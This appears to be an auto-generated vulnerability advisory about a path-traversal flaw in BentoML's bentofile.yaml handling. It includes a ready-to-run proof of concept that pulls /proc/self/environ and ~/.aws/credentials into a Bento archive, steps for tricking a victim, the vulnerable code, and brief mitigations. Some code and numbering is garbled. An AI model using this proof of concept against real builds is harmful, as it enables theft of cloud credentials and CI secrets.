Listen to this Post
The vulnerability exists in BentoML’s file path resolution for the `bentofile.yaml` configuration. The `resolve_user_filepath` function and direct `Path.joinpath` usage lack validation to prevent path traversal. When building a Bento, user-supplied paths in the description, docker.setup_script, docker.dockerfile_template, and `conda.environment_yml` fields are resolved. An attacker can craft paths using `../` sequences, absolute paths, or environment variable expansion ($HOME) to point outside the build context. The functions then copy the targeted file (e.g., /etc/passwd, /proc/self/environ, ~/.ssh/id_rsa) into the resulting Bento archive. This occurs because `os.path.realpath` and `shutil.copy` are used without checking if the final path is contained within the intended context directory, leading to arbitrary file exfiltration.
Platform: BentoML
Version: Vulnerable versions
Vulnerability: Path Traversal
Severity: Critical
date: 2024-08-15
Prediction: 2024-09-15
What Undercode Say:
cat > bentofile.yaml << 'EOF' service: "service.py:TestService" description: "file:/proc/self/environ" docker: dockerfile_template: "$HOME/.aws/credentials" EOF bentoml build cat ~/bentoml/bentos/test_service//README.md | tr '\0' '\n' | grep AWS_
Vulnerable code snippet def resolve_user_filepath(filepath: str, ctx: t.Optional[bash]) -> str: _path = os.path.expanduser(os.path.expandvars(filepath)) if not os.path.isabs(_path) and ctx: _path = os.path.expanduser(os.path.join(ctx, filepath)) if os.path.exists(_path): return os.path.realpath(_path) Missing containment check
How Exploit:
1. Create malicious `bentofile.yaml` with traversal paths.
2. Trick victim into running `bentoml build`.
- Exfiltrated files are embedded in the Bento archive.
4. Retrieve secrets via BentoCloud or shared registry.
Protection from this CVE
- Validate resolved paths.
- Restrict to build context.
- Apply path sanitization.
- Update BentoML version.
Impact:
- Credential Theft
- Supply Chain Compromise
- CI/CD Secret Exposure
- Data Exfiltration
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

